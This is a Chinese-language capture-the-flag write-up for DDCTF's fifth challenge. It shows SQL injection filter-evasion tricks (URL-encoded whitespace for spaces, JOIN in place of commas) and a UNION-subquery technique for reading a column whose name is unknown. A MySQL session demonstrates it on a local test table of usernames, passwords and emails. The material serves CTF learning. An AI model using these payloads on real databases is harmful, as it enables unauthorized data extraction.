前言
本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看详细的介绍:
实现思路
题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;
存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:
思想就是获取flag,让其在已知字段名下出现;
示例代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
|
mysql> select ( select 1)a,( select 2)b,( select 3)c,( select 4)d;
+ ---+---+---+---+
| a | b | c | d |
+ ---+---+---+---+
| 1 | 2 | 3 | 4 |
+ ---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from ( select 1)a,( select 2)b,( select 3)c,( select 4)d;
+ ---+---+---+---+
| 1 | 2 | 3 | 4 |
+ ---+---+---+---+
| 1 | 2 | 3 | 4 |
+ ---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from ( select 1)a,( select 2)b,( select 3)c,( select 4)d union select * from user ;
+ ---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
+ ---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+ ---+-------+----------+-------------+
4 rows in set (0.01 sec)
mysql> select e.4 from ( select * from ( select 1)a,( select 2)b,( select 3)c,( select 4)d union select * from user )e;
+ -------------+
| 4 |
+ -------------+
| 4 |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+ -------------+
4 rows in set (0.03 sec)
mysql> select e.4 from ( select * from ( select 1)a,( select 2)b,( select 3)c,( select 4)d union select * from user )e limit 1 offset 3;
+ -------------+
| 4 |
+ -------------+
| 120@120.com |
+ -------------+
1 row in set (0.01 sec)
mysql> select * from user where id=1 union select ( select e.4 from ( select * from ( select 1)a,( select 2)b,( select 3)c,( select 4)d
union select * from user )e limit 1 offset 3)f,( select 1)g,( select 1)h,( select 1)i;
+ -------------+----------+----------+-------------+
| id | username | password | email |
+ -------------+----------+----------+-------------+
| 1 | admin | admin888 | 110@110.com |
| 120@120.com | 1 | 1 | 1 |
+ -------------+----------+----------+-------------+
2 rows in set (0.04 sec)
|
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对服务器之家的支持。
原文链接:http://0cx.cc/some_tips_with_mysql.jspx